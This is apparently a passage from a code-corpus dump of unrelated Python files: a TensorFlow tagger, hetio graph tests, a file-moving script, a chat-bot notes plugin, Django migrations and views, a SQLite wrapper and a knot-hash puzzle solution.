        """Stack cuDNN bidirectional LSTM/GRU layers; returns [b, t, 2*h] units."""
        sequence_lengths = tf.to_int32(tf.reduce_sum(mask, axis=1))
        for n, n_hidden in enumerate(n_hidden_list):
            with tf.variable_scope(cell_type.upper() + '_' + str(n)):
                if cell_type.lower() == 'lstm':
                    units, _ = cudnn_bi_lstm(units, n_hidden, sequence_lengths)
                elif cell_type.lower() == 'gru':
                    units, _ = cudnn_bi_gru(units, n_hidden, sequence_lengths)
                else:
                    raise RuntimeError('Wrong cell type "{}"! Only "gru" and "lstm"!'.format(cell_type))
                # Concatenate forward and backward outputs.
                units = tf.concat(units, -1)
                if intra_layer_dropout and n != len(n_hidden_list) - 1:
                    units = variational_dropout(units, self._dropout_ph)
        return units

    def _build_rnn(self, units, n_hidden_list, cell_type, intra_layer_dropout, mask):
        """Stack plain bidirectional RNN layers; returns [b, t, 2*h] units."""
        sequence_lengths = tf.to_int32(tf.reduce_sum(mask, axis=1))
        for n, n_hidden in enumerate(n_hidden_list):
            units, _ = bi_rnn(units, n_hidden, cell_type=cell_type,
                              seq_lengths=sequence_lengths, name='Layer_' + str(n))
            # Concatenate forward and backward outputs.
            units = tf.concat(units, -1)
            if intra_layer_dropout and n != len(n_hidden_list) - 1:
                units = variational_dropout(units, self._dropout_ph)
        return units

    def _build_cnn(self, units, n_hidden_list, cnn_filter_width, use_batch_norm):
        """Apply a stack of 1-D convolutions over the token axis."""
        units = stacked_cnn(units, n_hidden_list, cnn_filter_width, use_batch_norm, training_ph=self.training_ph)
        return units

    def _build_top(self, units, n_tags, n_hididden, top_dropout, two_dense_on_top):
        """Project hidden units to per-token tag logits (optionally via one extra dense layer)."""
        if top_dropout:
            units = variational_dropout(units, self._dropout_ph)
        if two_dense_on_top:
            units = tf.layers.dense(units, n_hididden, activation=tf.nn.relu,
                                    kernel_initializer=INITIALIZER(),
                                    kernel_regularizer=tf.nn.l2_loss)
        logits = tf.layers.dense(units, n_tags, activation=None,
                                 kernel_initializer=INITIALIZER(),
                                 kernel_regularizer=tf.nn.l2_loss)
        return logits

    def _build_train_predict(self, logits, mask, n_tags, use_crf, l2_reg):
        """Build the loss (CRF log-likelihood or masked softmax CE) and train op."""
        if use_crf:
            sequence_lengths = tf.reduce_sum(mask, axis=1)
            log_likelihood, transition_params = tf.contrib.crf.crf_log_likelihood(logits, self._y_ph, sequence_lengths)
            loss_tensor = -log_likelihood
            # Kept for Viterbi decoding at prediction time.
            self._transition_params = transition_params
        else:
            ground_truth_labels = tf.one_hot(self._y_ph, n_tags)
            loss_tensor = tf.nn.softmax_cross_entropy_with_logits(labels=ground_truth_labels, logits=logits)
            # Zero out the loss contribution of padding positions.
            loss_tensor = loss_tensor * mask
            self._y_pred = tf.argmax(logits, axis=-1)
        loss = tf.reduce_mean(loss_tensor)
        # L2 regularization
        if l2_reg > 0:
            loss += l2_reg * tf.reduce_sum(tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES))
        train_op = self.get_train_op(loss)
        return train_op, loss

    def predict_no_crf(self, xs):
        """Greedy (argmax) decoding; returns per-utterance tag-index arrays."""
        feed_dict = self._fill_feed_dict(xs)
        pred_idxs, mask = self.sess.run([self._y_pred, self.mask_ph], feed_dict)
        # Filter by sequence length
        sequence_lengths = np.sum(mask, axis=1).astype(np.int32)
        pred = []
        for utt, l in zip(pred_idxs, sequence_lengths):
            pred.append(utt[:l])
        return pred

    def predict_crf(self, xs):
        """Viterbi decoding with the learned CRF transition parameters."""
        feed_dict = self._fill_feed_dict(xs)
        logits, trans_params, mask = self.sess.run([self._logits,
                                                    self._transition_params,
                                                    self.mask_ph],
                                                   feed_dict=feed_dict)
        # Clamp to >= 1 so viterbi_decode always sees at least one step.
        sequence_lengths = np.maximum(np.sum(mask, axis=1).astype(np.int32), 1)
        # iterate over the sentences because no batching in viterbi_decode
        y_pred = []
        for logit, sequence_length in zip(logits, sequence_lengths):
            logit = logit[:int(sequence_length)]  # keep only the valid steps
            viterbi_seq, viterbi_score = tf.contrib.crf.viterbi_decode(logit, trans_params)
            y_pred += [viterbi_seq]
        return y_pred

    def _fill_feed_dict(self, xs, y=None, train=False):
        """Map input batches (and optionally labels) onto the graph placeholders."""
        assert len(xs) == len(self._xs_ph_list)
        xs = list(xs)
        xs[0] = np.array(xs[0])
        feed_dict = {ph: x for ph, x in zip(self._xs_ph_list, xs)}
        if y is not None:
            feed_dict[self._y_ph] = y
        feed_dict[self.training_ph] = train
        if not train:
            # Disable dropout at inference time.
            feed_dict[self._dropout_ph] = 1.0
        return feed_dict

    def __call__(self, *args, **kwargs):
        """Predict tags for a batch; empty batches short-circuit to []."""
        if len(args[0]) == 0 or (len(args[0]) == 1 and len(args[0][0]) == 0):
            return []
        return self.predict(args)

    def train_on_batch(self, *args):
        """Run one optimization step; args are (*input_batches, label_batch)."""
        *xs, y = args
        feed_dict = self._fill_feed_dict(xs, y, train=True)
        _, loss_value = self.sess.run([self.train_op, self.loss], feed_dict)
        return {'loss': loss_value,
                'learning_rate': self.get_learning_rate(),
                'momentum': self.get_momentum()}

    def process_event(self, event_name, data):
        """Forward training events (e.g. LR schedule updates) to the base class."""
        super().process_event(event_name, data)
|
991,250 | 6bf50364d8153e8509974dc773a94e64c5c98ce4 | import os
import pytest
import hetio.hetnet
import hetio.readwrite
from .readwrite_test import formats, extensions
def test_creation(tmpdir):
    """End-to-end check of MetaGraph/Graph construction, duplicate/ordering
    guards, counts, and round-tripping through every readwrite format.

    Note: steps are order-dependent (each assertion relies on the nodes and
    edges added before it), so do not reorder.
    """
    # Convert py._path.local.LocalPath to a string
    tmpdir = str(tmpdir)
    # Construct metagraph
    metaedge_tuples = [
        ('compound', 'disease', 'treats', 'both'),
        ('disease', 'gene', 'associates', 'both'),
        ('compound', 'gene', 'targets', 'both'),
        ('gene', 'gene', 'interacts', 'both'),
        ('gene', 'gene', 'transcribes', 'forward'),
    ]
    metanode_ids = 'compound', 'disease', 'gene'
    metagraph = hetio.hetnet.MetaGraph.from_edge_tuples(metaedge_tuples)
    # check that nodes got added to metagraph_node_dict
    assert frozenset(metagraph.node_dict) == frozenset(metanode_ids)
    for metanode in metagraph.node_dict.values():
        assert isinstance(metanode, hetio.hetnet.MetaNode)
    # check that metanode.get_id() and hash(metanode) are working as expected
    for metanode_id in metanode_ids:
        metanode = metagraph.node_dict[metanode_id]
        assert metanode.identifier == metanode_id
        assert metanode.get_id() == metanode_id
        assert hash(metanode) == hash(metanode_id)
    # Check metanode and metaedge counts
    assert metagraph.n_nodes == len(metanode_ids)
    assert metagraph.n_edges == len(metaedge_tuples)
    # 4 invertible metaedges: the 'forward' transcribes edge has a distinct
    # inverse direction, unlike the four 'both' edges.
    assert metagraph.n_inverts == 4
    # Create a graph
    graph = hetio.hetnet.Graph(metagraph)
    # Create a node for multiple sclerosis
    ms = graph.add_node('disease', 'DOID:2377', 'multiple sclerosis')
    assert ms.metanode.identifier == 'disease'
    assert ms.identifier == 'DOID:2377'
    assert ms.name == 'multiple sclerosis'
    assert ms.get_id() == ('disease', 'DOID:2377')
    # Create gene nodes
    IL7R = graph.add_node('gene', 3575, 'IL7R')
    SPI1 = graph.add_node('gene', 6688, name='SPI1',
                          data={'description': 'Spi-1 proto-oncogene'})
    # Attempt to add a duplicate node
    with pytest.raises(AssertionError):
        graph.add_node('gene', 3575, 'IL7R')
    # Misordered node creation arguments
    with pytest.raises(KeyError):
        graph.add_node('DOID:2377', 'multiple sclerosis', 'disease')
    # add_edge accepts either node objects or their get_id() tuples.
    graph.add_edge(IL7R.get_id(), SPI1.get_id(), 'transcribes', 'forward')
    graph.add_edge(IL7R, SPI1.get_id(), 'interacts', 'both')
    graph.add_edge(ms.get_id(), IL7R, 'associates', 'both')
    # Enable in future to check that creating a duplicate edge throws an error
    with pytest.raises(AssertionError):
        graph.add_edge(IL7R, SPI1, 'transcribes', 'forward')
    # excinfo.match(r'edge already exists')  # Disabled since new pytest feature
    with pytest.raises(AssertionError):
        graph.add_edge(SPI1, IL7R, 'transcribes', 'backward')
    # Add bidirectional self loop
    graph.add_edge(IL7R, IL7R, 'interacts', 'both')
    # Test node and edge counts
    assert graph.n_nodes == 3
    assert graph.n_edges == 4
    # The bidirectional self-loop is its own inverse, hence 3 not 4.
    assert graph.n_inverts == 3
    assert graph.n_nodes == len(list(graph.get_nodes()))
    assert graph.n_edges == len(list(graph.get_edges(exclude_inverts=True)))
    assert (graph.n_edges + graph.n_inverts ==
            len(list(graph.get_edges(exclude_inverts=False))))
    # Test writing then reading graph
    for extension in extensions:
        for format_ in formats:
            ext = '.{}{}'.format(format_, extension)
            # Write metagraph
            path = os.path.join(tmpdir, 'metagraph' + ext)
            hetio.readwrite.write_metagraph(metagraph, path)
            hetio.readwrite.read_metagraph(path)
            # Write graph
            path = os.path.join(tmpdir, 'graph' + ext)
            hetio.readwrite.write_graph(graph, path)
            hetio.readwrite.read_graph(path)
def test_disase_gene_example():
    """
    Recreate hetnet from https://doi.org/10.1371/journal.pcbi.1004259.g002.

    Exercises the metagraph getter methods (get_metanode / get_metaedge /
    get_metapath, by object, id tuple, and abbreviation) and then checks
    node/edge counts after rebuilding the figure's example network.
    """
    # NOTE(review): "disase" is a typo for "disease", but the function name
    # is the collected pytest id -- renaming would change the interface.
    metaedge_id_GaD = 'Gene', 'Disease', 'association', 'both'
    metaedge_tuples = [
        metaedge_id_GaD,
        ('Gene', 'Tissue', 'expression', 'both'),
        ('Disease', 'Tissue', 'localization', 'both'),
        ('Gene', 'Gene', 'interaction', 'both'),
    ]
    metagraph = hetio.hetnet.MetaGraph.from_edge_tuples(metaedge_tuples)
    # Test metagraph getter methods
    # Test metagraph.get_metanode
    gene_metanode = metagraph.node_dict['Gene']
    assert metagraph.get_metanode(gene_metanode) == gene_metanode
    assert metagraph.get_metanode('Gene') == gene_metanode
    assert metagraph.get_metanode('G') == gene_metanode
    # Test metagraph.get_metaedge
    metaedge_GaD = metagraph.get_edge(metaedge_id_GaD)
    assert metagraph.get_metaedge(metaedge_GaD) == metaedge_GaD
    assert metaedge_id_GaD == metaedge_GaD.get_id()
    assert metagraph.get_metaedge(metaedge_id_GaD) == metaedge_GaD
    assert metagraph.get_metaedge('GaD') == metaedge_GaD
    # Test metaedge.abbrev property
    assert metaedge_GaD.abbrev == 'GaD'
    # Test metagraph.get_metapath
    metapath_abbrev = 'TlDaGiG'
    metapath = metagraph.metapath_from_abbrev(metapath_abbrev)
    assert metagraph.get_metapath(metapath) == metapath
    assert metagraph.get_metapath(metapath_abbrev) == metapath
    assert metagraph.get_metapath(metapath.edges) == metapath
    # Test metapath.abbrev property
    assert metapath.abbrev == metapath_abbrev
    # Create graph
    graph = hetio.hetnet.Graph(metagraph)
    nodes = dict()
    # Add gene nodes
    for symbol in ['STAT3', 'IRF1', 'SUMO1', 'IL2RA', 'IRF8', 'ITCH', 'CXCR4']:
        node = graph.add_node('Gene', symbol)
        nodes[symbol] = node
    # Add tissue nodes
    for tissue in ['Lung', 'Leukocyte']:
        node = graph.add_node('Tissue', tissue)
        nodes[tissue] = node
    # Add disease nodes
    for disease in ["Crohn's Disease", 'Multiple Sclerosis']:
        node = graph.add_node('Disease', disease)
        nodes[disease] = node
    # 7 genes + 2 tissues + 2 diseases
    assert graph.n_nodes == 11
    # Add GiG edges
    graph.add_edge(nodes['IRF1'], nodes['SUMO1'], 'interaction', 'both')
    graph.add_edge(nodes['IRF1'], nodes['IL2RA'], 'interaction', 'both')
    graph.add_edge(nodes['IRF1'], nodes['IRF8'], 'interaction', 'both')
    graph.add_edge(nodes['IRF1'], nodes['CXCR4'], 'interaction', 'both')
    graph.add_edge(nodes['ITCH'], nodes['CXCR4'], 'interaction', 'both')
    # Add GaD edges
    meta = 'association', 'both'
    graph.add_edge(nodes['IRF1'], nodes["Crohn's Disease"], *meta)
    graph.add_edge(nodes["Crohn's Disease"], nodes['STAT3'], *meta)
    graph.add_edge(nodes['STAT3'], nodes['Multiple Sclerosis'], *meta)
    graph.add_edge(nodes['IL2RA'], nodes['Multiple Sclerosis'], *meta)
    graph.add_edge(nodes['IRF8'], nodes['Multiple Sclerosis'], *meta)
    graph.add_edge(nodes['CXCR4'], nodes['Multiple Sclerosis'], *meta)
    # Add TeG edges
    graph.add_edge(nodes['IRF1'], nodes["Lung"], 'expression', 'both')
    graph.add_edge(nodes['IRF1'], nodes["Leukocyte"], 'expression', 'both')
    # Add DlT edges
    graph.add_edge(nodes['Multiple Sclerosis'], nodes["Leukocyte"],
                   'localization', 'both')
    # 5 GiG + 6 GaD + 2 GeT + 1 DlT
    assert graph.n_edges == 14
    assert graph.count_nodes('Disease') == 2
    assert graph.count_nodes(gene_metanode) == 7
|
991,251 | 1cfab9f015f23eb9965d8431f9d16cd6519ae972 | #moving files from my desktop to a
#specific folder on my desktop
import os
import shutil
#Be sure to be in the directory your python program is in before running
# Directory scanned for files to move (placeholder path - edit before use).
sourcePath = '/Path/To/Your/Source'
# Snapshot of the source directory's entries, taken once at import time.
source = os.listdir(sourcePath)
# Target directory for the matched files (placeholder path - edit before use).
destinationPath = '/Destination/You/Want/Your/File/Moved/To'
def scanAndMoveFiles():
    """Move known media/document files from sourcePath to destinationPath.

    Scans the module-level ``source`` directory listing and moves every
    file whose extension matches one of the known extensions. Matching is
    case-insensitive, which covers the upper-case 'JPG' names the original
    chain of ``or`` clauses targeted.
    """
    # str.endswith accepts a tuple of suffixes: one call instead of a chain
    # of or-ed calls. Requiring the leading dot also fixes the original
    # 'JPG'/'jpg' patterns, which accidentally matched names merely *ending*
    # in those three letters (e.g. 'reportJPG').
    extensions = ('.png', '.gif', '.mp4', '.jpg', '.pdf')
    for name in source:
        if name.lower().endswith(extensions):
            shutil.move(os.path.join(sourcePath, name),
                        os.path.join(destinationPath, name))
# Run the scan, then confirm completion on stdout.
scanAndMoveFiles()
# Parenthesised print works on both Python 2 and 3; the original bare
# print statement is a SyntaxError on Python 3.
print('all your files have been moved')
|
991,252 | c3b3ffed6825b3158830baabb629d608dd63fc4c | import asyncio, random
import os, io, gettext
import time
from hangupsbot.utils import strip_quotes, text_to_segments
from hangupsbot.commands import command
import appdirs
### NOTAS ###
@command.register
def recuerda(bot, event, *args):
    """Guarda un mensaje en la libreta de notas\nUso: <bot> recuerda [nota]"""
    # One notebook file per user, keyed by chat id, under the app data dir.
    arg = ' '.join(args)
    dirs = appdirs.AppDirs('hangupsbot', 'hangupsbot')
    nota = os.path.join(dirs.user_data_dir, str(event.user_id.chat_id) + ".txt")
    # Timestamp + author header, then the note body.
    msg = (time.ctime() + '\n[{}]\n' + '{}' + '\n\n').format(event.user.full_name, arg)
    # Append mode creates the file when missing and -- unlike the previous
    # open(..., 'r+') followed by write() at offset 0 -- never overwrites
    # notes saved earlier. The with-block also guarantees the file is closed.
    with open(nota, 'a') as f:
        f.write(msg)
    yield from event.conv.send_message(text_to_segments('Guardado'))
@command.register
def notas(bot, event, *args):
    """Muestra las notas guardadas \n Uso: <bot> notas"""
    dirs = appdirs.AppDirs('hangupsbot', 'hangupsbot')
    nota = os.path.join(dirs.user_data_dir, str(event.user_id.chat_id) + ".txt")
    # Create an empty notebook on first use so the read below cannot fail
    # (replaces the original os.mknod, which is Unix-only).
    if not os.path.isfile(nota):
        open(nota, 'w').close()
    text = 'Notas:\n'
    with open(nota, 'r') as f:
        for line in f:
            # NOTE(review): _ is assumed to be installed globally by the
            # bot's gettext setup -- it is not defined in this module.
            text = _(text + line)
    yield from event.conv.send_message(text_to_segments(text))
@command.register(admin=True)
def deletenotas(bot, event, *args):
    """Borra la libreta de notas (Solo admins)\n Uso: <bot> deletenotas"""
    dirs = appdirs.AppDirs('hangupsbot', 'hangupsbot')
    nota = os.path.join(dirs.user_data_dir, str(event.user_id.chat_id) + ".txt")
    # Mode 'w' creates the file when missing and truncates it otherwise,
    # so the original isfile/os.mknod dance is unnecessary. A single space
    # is written, exactly as before, leaving an effectively empty notebook.
    with open(nota, 'w') as f:
        f.write(' ')
    yield from event.conv.send_message(text_to_segments('Borradas todas las notas'))
|
991,253 | cb633ac84da15cfe4181bc30f0067dd1e75ae320 | # Generated by Django 2.2.1 on 2019-06-08 01:31
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated initial migration: creates the site's content models
    (About, ContactUs, EmailSettings, Guide, MainPageInfo, MottoEmailPhone,
    Person, Services, WhyUs). Generated by Django -- edit via new migrations,
    not by hand.
    """

    initial = True

    dependencies = [
    ]

    operations = [
        # Free-text "About us" page content.
        migrations.CreateModel(
            name='About',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('description', models.TextField(max_length=10000)),
            ],
            options={
                'verbose_name': 'About',
                'verbose_name_plural': 'About us',
            },
        ),
        # Free-text "Contact us" page content.
        migrations.CreateModel(
            name='ContactUs',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('description', models.TextField()),
            ],
            options={
                'verbose_name': 'Contact us',
                'verbose_name_plural': 'Contact us',
            },
        ),
        # Outgoing-mail configuration stored in the database.
        migrations.CreateModel(
            name='EmailSettings',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('full_email', models.CharField(default=None, max_length=60)),
                ('email_host', models.CharField(max_length=40)),
                ('email_port', models.PositiveIntegerField()),
                ('email_host_user', models.CharField(max_length=50)),
                ('email_host_password', models.CharField(max_length=50)),
                ('email_use_ssl', models.BooleanField(default=True)),
            ],
            options={
                'verbose_name': 'Email settings',
                'verbose_name_plural': 'Email settings',
            },
        ),
        # Long-form tenancy guide text.
        migrations.CreateModel(
            name='Guide',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('description', models.TextField(max_length=100000)),
            ],
            options={
                'verbose_name': 'Tenancy guide',
                'verbose_name_plural': 'Tenancy guide',
            },
        ),
        # Landing-page image and blurb.
        migrations.CreateModel(
            name='MainPageInfo',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('image', models.ImageField(default=False, upload_to='media/main_page')),
                ('description', models.TextField()),
            ],
            options={
                'verbose_name': 'Main page info',
                'verbose_name_plural': 'Main page info',
            },
        ),
        # Site-wide contact details and social links.
        migrations.CreateModel(
            name='MottoEmailPhone',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('motto', models.CharField(default='Your future starts with us', max_length=100)),
                ('email', models.EmailField(max_length=254)),
                ('phone', models.CharField(default='(09) 215 1267', max_length=18)),
                ('facebook', models.URLField(default='http://facebook.com')),
                ('linkedin', models.URLField(default='http://linkedin.com')),
            ],
            options={
                'verbose_name': 'Motto, email, and phone number',
                'verbose_name_plural': 'Motto, email, and phone number',
            },
        ),
        # Staff/personnel profile.
        migrations.CreateModel(
            name='Person',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=50)),
                ('email', models.EmailField(max_length=254)),
                ('phone', models.CharField(max_length=15)),
                ('about', models.TextField(max_length=1000)),
                ('image', models.ImageField(default=None, upload_to='media/personnel/')),
            ],
            options={
                'verbose_name': 'Person',
                'verbose_name_plural': 'People',
            },
        ),
        # A single offered service.
        migrations.CreateModel(
            name='Services',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=200)),
                ('description', models.TextField(max_length=2000)),
            ],
            options={
                'verbose_name': 'Service',
                'verbose_name_plural': 'Services',
            },
        ),
        # "Why choose us" marketing copy.
        migrations.CreateModel(
            name='WhyUs',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('description', models.TextField(max_length=3000)),
            ],
            options={
                'verbose_name': 'Why McDonald Property?',
                'verbose_name_plural': 'Why McDonald Property?',
            },
        ),
    ]
|
991,254 | 05941d7c4ba5c357b08c0bdfa682925299f90b3f | def gcd(a, b):
if(a % b == 0):
return b
return gcd(b, a % b)
import sys
# Keep a handle to the real stdout, then redirect stdin/stdout to the
# contest's fixed input/output files.
out = sys.stdout
sys.stdin = open('toral.in', 'r')
sys.stdout = open('toral.out', 'w')
# NOTE(review): raw_input is Python 2 only; under Python 3 this line would
# need input() instead.
s = raw_input().split()
n = int(s[0])
m = int(s[1])
# Answer is gcd of the two input numbers, written to toral.out.
print(gcd(n, m))
991,255 | f173af4a87bffc6ec97d428ffa2425241f2e686e | from __future__ import annotations
import sqlite3
from dataclasses import dataclass
from pathlib import Path
from typing import Optional, Tuple, Union
from lib.classifier.datasets import Category
@dataclass
class PostsEntry:
    """One classified post as stored in the ``posts`` table."""

    id: str                 # post identifier (table primary key)
    prediction: Category    # predicted category
    probability: float      # confidence of the prediction

    @classmethod
    def from_db_entry(cls, entry: Tuple[str, int, float]) -> PostsEntry:
        """Build an entry from a raw ``(id, target, probability)`` row."""
        post_id, target, prob = entry
        return cls(
            id=post_id,
            prediction=Category.from_target(target),
            probability=prob,
        )

    def as_db_entry(self) -> Tuple[str, int, float]:
        """Serialize back to the raw row shape used by the database."""
        return (self.id, self.prediction.as_target(), self.probability)
class PostsDb:
    """Thin wrapper around a sqlite3 database holding classified posts.

    Schema: posts(id TEXT PRIMARY KEY, prediction INTEGER, probability REAL).
    """

    _connection: sqlite3.Connection
    _cursor: sqlite3.Cursor

    def __init__(self, connection: sqlite3.Connection, cursor: sqlite3.Cursor) -> None:
        self._connection = connection
        self._cursor = cursor

    @classmethod
    def from_file_else_create(cls, db_path: Path) -> PostsDb:
        """Open an existing database, creating it (with schema) if absent."""
        try:
            db = cls.from_file(db_path)
        except FileNotFoundError:
            db = cls.create(db_path)
        return db

    @classmethod
    def from_file(cls, db_path: Path) -> PostsDb:
        """Open an existing database file; raise FileNotFoundError if missing."""
        # sqlite3.connect would silently create a new empty file; check first.
        if not db_path.exists():
            raise FileNotFoundError()
        connection = sqlite3.connect(db_path)
        cursor = connection.cursor()
        return cls(connection, cursor)

    @classmethod
    def create(cls, db_path: Union[str, Path]) -> PostsDb:
        """Create a new database (and parent directories) with the posts table."""
        # ":memory:" is sqlite's name for an in-memory database; it must not
        # be treated as a filesystem path.
        if db_path != ":memory:":
            # Create directory if needed
            db_path = Path(db_path)
            db_path.parent.mkdir(exist_ok=True, parents=True)
        connection = sqlite3.connect(db_path)
        cursor = connection.cursor()
        cursor.executescript(
            """
            CREATE TABLE posts(
                id TEXT NOT NULL PRIMARY KEY,
                prediction INTEGER NOT NULL,
                probability REAL NOT NULL
            )
            """
        )
        return cls(connection, cursor)

    def insert(self, entry: PostsEntry) -> None:
        """Insert one entry and commit immediately (write volume is low)."""
        self._cursor.execute("INSERT INTO posts VALUES (?, ?, ?)", entry.as_db_entry())
        self._connection.commit()

    def find(self, desired_id: str) -> Optional[PostsEntry]:
        """Return the entry with the given id, or None when absent."""
        self._cursor.execute("SELECT * FROM posts WHERE id=?", (desired_id,))
        # id is the primary key, so at most one row exists; fetchone avoids
        # materializing a whole result list as fetchall did.
        row = self._cursor.fetchone()
        if row is None:
            return None
        return PostsEntry.from_db_entry(row)

    def close(self) -> None:
        """Release the cursor and the underlying connection.

        The original closed only the cursor, leaking the sqlite connection
        (and any uncommitted state) until garbage collection.
        """
        self._cursor.close()
        self._connection.close()
|
991,256 | 1263d3a3430e7334280e16e29b5d34a05548e422 | from functools import reduce
import binascii
def reverse_circular_sublist(array, start, end):
    """Reverse, in place, the circular slice of *array* from start to end.

    Both indices are inclusive; when end < start the slice wraps around the
    end of the list. The mutated list is also returned for convenience.
    """
    if end >= start:
        window = array[start:end + 1]
    else:
        # Wrapping slice: tail piece followed by head piece.
        window = array[start:] + array[:end + 1]
    size = len(array)
    # Write the reversed window back, stepping circularly from `start`.
    for offset, value in enumerate(reversed(window)):
        array[(start + offset) % size] = value
    return array
def part_1_hash(notched_string, lengths, pos_0, skip_0):
    """Run one round of the AoC "knot hash" over *notched_string*.

    Starting from position pos_0 with skip size skip_0, each length pinches
    and reverses a circular sublist. Returns the updated list together with
    the final position and skip size so further rounds can resume.
    """
    size = len(notched_string)
    pos, skip = pos_0, skip_0
    for length in lengths:
        # A zero-length pinch reverses nothing; skipping it also avoids a
        # bogus wrap-around slice ending at index -1.
        if length:
            notched_string = reverse_circular_sublist(
                notched_string, pos, (pos + length - 1) % size)
        pos = (pos + length + skip) % size
        skip += 1
    return (notched_string, pos, skip)
def densify_block( sparse_block ):
return reduce( (lambda x,y: x ^ y), sparse_block)
if __name__ == "__main__":
    # --- Part 1: one knot-hash round over 0..255 with the lengths from input.txt.
    # NOTE(review): input files are opened without a with-block and never
    # explicitly closed -- fine for a one-shot script, but worth confirming.
    inFile = open("input.txt", "r")
    lengths = inFile.readline().strip().split(",")
    notched_string = list(range(256))
    lengths = [int(length) for length in lengths]
    notched_string, pos, skip = part_1_hash(notched_string, lengths, 0, 0)
    # Puzzle answer: product of the first two elements after one round.
    part1 = notched_string[0] * notched_string[1]
    print(f"Part 1: {part1}")
    # --- Part 2: full knot hash over the raw characters of the same line.
    notched_string = list(range(256))
    inFile = open("input.txt", "r")
    chars = inFile.readline().strip()
    # Input for part two is the string lengths as the ascii values of the
    # input file characters, plus a few specified extras thrown on
    ascii_lengths = [ord(char) for char in chars]
    ascii_lengths += [17, 31, 73, 47, 23]
    # Then run 64 rounds of the knot hash
    pos = 0
    skip = 0
    for i in range(64):
        notched_string, pos, skip = part_1_hash( notched_string,
                                                 ascii_lengths,
                                                 pos,
                                                 skip )
    # Then densify 16 sets of 16 number long lists
    sparce_blocks = [notched_string[i:i+16] for i in range(0, 256, 16)]
    sparce_hashes = [densify_block(sparce_block) for sparce_block in sparce_blocks]
    # Finally, report the hash in hexadecimal
    # (hexlify returns bytes, so the printed value shows as b'...').
    part2 = binascii.hexlify(bytes(bytearray(sparce_hashes)))
    print( f"Part 2: {part2}" )
|
991,257 | 3eb411f58111baa719f7bfea6f1a96c46133dd79 | # Generated by Django 3.0.6 on 2020-07-11 01:00
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: alter OrdenCompra.status to a CharField with default
    'En espera' and max_length 50. Generated by Django -- do not hand-edit.
    """

    dependencies = [
        ('store', '0012_auto_20200710_2050'),
    ]

    operations = [
        migrations.AlterField(
            model_name='ordencompra',
            name='status',
            field=models.CharField(default='En espera', max_length=50),
        ),
    ]
|
991,258 | 1fa13dc89774890147456f1d663ab603b9e5e13e | # -*- coding: utf-8 -*-
# Package version, consumed by packaging/CLI tooling.
__version__ = '0.1.2'
# Program metadata: name and one-line description of the tool.
program_name = 'refseq_masher'
program_desc = 'Mash MinHash search your sequences against a NCBI RefSeq genomes database'
|
991,259 | df61aab31369626be0953847387075e8e1b70950 | from django import http
from django.http.response import HttpResponse
from django.shortcuts import render,redirect
from django.contrib.auth.models import User
from myapplication.models import Singup
from myapplication.forms import SignUpForm,LoginForm,UpdateForm
from django.contrib import messages
from django.contrib.auth import login,logout,authenticate
# Create your views here.
def signup(request):
    """Handle new-account registration posted from the index page.

    A valid POST creates the account and returns to the index; already
    authenticated users are sent to the dashboard instead.
    """
    if request.user.is_authenticated:
        # BUG FIX: the original called redirect() here without returning it,
        # so the view fell off the end and returned None.
        return redirect('/dashboard/')
    if request.method == 'POST':
        fm = SignUpForm(request.POST)
        if fm.is_valid():
            fm.save()
            messages.success(request, 'Your account has been secussfully created')
            return redirect('/')
    # BUG FIX: GET requests and invalid forms previously returned None,
    # which Django treats as an error; fall back to the index page, where
    # user_login renders the signup form.
    return redirect('/')
def user_login(request):
    """Log a user in from the index page.

    Authenticated users go straight to the dashboard; otherwise the index
    template is rendered with a login form and a signup form.
    """
    if request.user.is_authenticated:
        return redirect('/dashboard/')
    # BUG FIX: bind the signup form unconditionally. The original only built
    # it on GET, so an invalid POST (or failed authentication) reached the
    # render() call with `signup` unbound and raised NameError.
    signup_form = SignUpForm()
    if request.method == 'POST':
        fm = LoginForm(request=request, data=request.POST)
        if fm.is_valid():
            username = fm.cleaned_data['username']
            password = fm.cleaned_data['password']
            user = authenticate(username=username, password=password)
            if user is not None:
                login(request, user)
                messages.success(request, 'You have successfully login')
                return redirect('/dashboard/')
    else:
        fm = LoginForm()
    # Re-render with the (possibly bound, error-carrying) login form.
    return render(request, 'myapplication/index.html',
                  {'form': fm, 'signupform': signup_form})
def dashboard(request):
    """Render the dashboard listing every registered user plus an update form."""
    context = {
        'user': Singup.objects.all(),
        'form': UpdateForm(),
    }
    return render(request, 'myapplication/dashboard.html', context)
def userupdate(request, id):
    """Edit one Singup record: save on a valid POST, otherwise show the form.

    An invalid POST re-renders with the bound form so validation errors show.
    """
    record = Singup.objects.get(pk=id)
    if request.method == 'POST':
        fm = UpdateForm(request.POST, instance=record)
        if fm.is_valid():
            fm.save()
            messages.success(request, 'Your record has been secussfully updated')
            return redirect('/dashboard/')
    else:
        fm = UpdateForm(instance=record)
    return render(request, 'myapplication/update.html', {'form': fm})
def user_logout(request):
    """Terminate the current session and return to the index page."""
    logout(request)
    return redirect('/')
def user_delete(request, id):
    """Delete one Singup record (POST only) and return to the dashboard."""
    if request.method == 'POST':
        obj = Singup.objects.get(pk=id)
        obj.delete()
    # Always return a response: a non-POST request previously let the view
    # return None, which Django reports as an error.
    return redirect('/dashboard/')
|
991,260 | 8ab0ecb085cc7b0e9ffb8d6ccb52e0cd76730a71 | a=input().split(",")
for i in range(len(a)):
a[i]=int(a[i])
a.sort()
print(a[0]) |
991,261 | 9eb467a0786bb961de70456690c32e44e4a17e9a | # Generated by Django 3.1.7 on 2021-03-19 14:37
from django.conf import settings
import django.contrib.auth.models
